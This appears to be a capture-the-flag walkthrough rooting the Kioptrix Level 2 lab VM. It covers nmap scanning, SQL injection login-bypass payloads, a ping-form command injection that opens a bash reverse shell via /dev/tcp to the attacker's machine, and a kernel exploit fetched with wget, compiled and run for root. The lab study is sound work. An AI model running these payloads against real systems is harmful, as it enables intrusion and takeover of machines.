Kioptrix Level 2 was quite a bit harder than Kioptrix Level 1. It requires understanding the web application and trying several different approaches before a vulnerability turns up.
Requirements:
- VMware
- Kioptrix Level 2 VM
- Kali [or any attacking distribution of your choice]
So let's dive in:
-> nmap 192.168.0.1/24
My Kioptrix machine has the IP address 192.168.0.108. Let's scan its open ports and identify the services running on them:
-> nmap -sV 192.168.0.108
-> nmap -sV -A 192.168.0.108
(-A adds OS detection, script scanning and traceroute on top of version detection, so the second scan is a superset of the first; its output follows.)
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-14 10:01 EDT
Nmap scan report for 192.168.0.108
Host is up (0.00026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 677/udp status
|_ 100024 1 680/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2017-03-14T10:40:22+00:00; -3h22m16s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:95:15:33 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds
The very first thing I thought of after all this was to look for an exploitable version. The scan already flags several weak spots worth noting: SSHv1 and SSLv2 are still enabled, the HTTPS certificate expired in 2010, CUPS 1.1 advertises the PUT method, and MySQL is exposed on 3306. CUPS with PUT allowed was my first target; I poked around it and got nothing. The next thing I did was look at the website running on port 80, which presents a login form. It looks like this:
As you can see in the screenshot, I tried SQL injection on the username and password fields. In my case the '--' comment sequence does not work in the username field but '#' does. The likely reason is that MySQL only treats '--' as a comment when it is followed by whitespace, and a trailing space is easily lost on the way into the query, whereas '#' comments to the end of the line unconditionally. The tautology payload
-> 'or'a'='a
works like a charm:
username: 'or'a'='a
password: 'or'a'='a
or
username: admin' #
password: *blank*
Either way the login succeeds without knowing a valid password.
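As an added example (not code from the walkthrough or from the Kioptrix VM), here is the bypass reproduced against an in-memory SQLite table with a constructed user list. The real application is PHP on MySQL and its source is not shown, so the string-built query below is an assumption about its shape; the admin' # variant is left out because SQLite has no # comment, but the tautology payload behaves identically in both engines.

```python
"""Login bypass with the walkthrough's tautology payload, reproduced against
an in-memory SQLite table. The Kioptrix application is MySQL-backed and its
source is not shown, so the query shape below is an assumption."""
import sqlite3


def make_db():
    """Constructed sample user table, not data from the Kioptrix VM."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cr3t"), ("john", "hunter2")])
    return db


def vulnerable_login(db, username, password):
    """Assumed vulnerable pattern: form values pasted straight into the SQL.
    Returns the matched username, or None when the login fails."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Parameterised query: the quote in the payload is bound as data, so the
    WHERE clause can never change shape."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


# The payload from the walkthrough. Injected into both fields it yields
#   ... WHERE username=''or'a'='a' AND password=''or'a'='a'
# which, with AND binding tighter than OR, is true for every row.
TAUTOLOGY = "'or'a'='a"


if __name__ == "__main__":
    db = make_db()
    for label, user, pw in [("valid", "admin", "s3cr3t"),
                            ("wrong pw", "admin", "nope"),
                            ("tautology", TAUTOLOGY, TAUTOLOGY)]:
        print("%-10s vulnerable=%-6s safe=%s" % (
            label, vulnerable_login(db, user, pw), safe_login(db, user, pw)))
```

Running the file shows the string-built query logging in as admin with the tautology payload while the parameterised query rejects it; only the real credentials pass both.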
-> Try pinging some IP and watch the response. The form hands the value to a shell, so OS command injection is possible here: we can stack our own commands after the address and read their output straight from the page. && and ; let us chain commands (&& runs the next command only if the previous one succeeded, ; runs it regardless); | is a pipe, which feeds one command's output into the next, but we do not need it for now.
-> We can try out commands such as:
whoami
uname
hostname
cat /etc/passwd
lsb_release
uname -r
-> For now let's open an interactive bash and connect it back to our machine for a better view. Before submitting anything, start a listener on your machine on any port [in my case 4444]:
-> Listen on Kali: nc -lvp 4444
Then enter the following in the ping input box:
-> 192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1
192.168.0.106 is my Kali machine, where netcat is listening on port 4444.
Once you submit this, the page stays busy (the web request never completes because bash is holding the connection open), and netcat reports the incoming connection: we have a shell.
This shell is no different from the one we have been driving through the web form, but it is far more convenient. Running whoami returns apache, which means we are not root and are limited to what the apache user can do. To get past this we need a vulnerability we can reach from inside the system (or through another port) to escalate privileges. After looking around a bit, I checked the kernel version.
A little search on kernel 2.6.9 turns up a matching local root exploit on Exploit-DB:
Let's download it. The apache user cannot write anywhere except /tmp, so fetch the exploit into /tmp and compile and run it from there:
-> wget -O /tmp/shell.c https://www.exploit-db.com/download/9542 --no-check-certificate
-> to compile the file: gcc /tmp/shell.c -o /tmp/run
-> /tmp/run
Kernel exploits can panic the machine, so take a VM snapshot first, and check that uname -r and the distribution release match what the exploit was written for before running it.
After running the exploit we have root, which whoami confirms.
I then changed the root password so I could log in to Kioptrix directly and make whatever changes I want.
That's how I got root on the Kioptrix Level 2 challenge.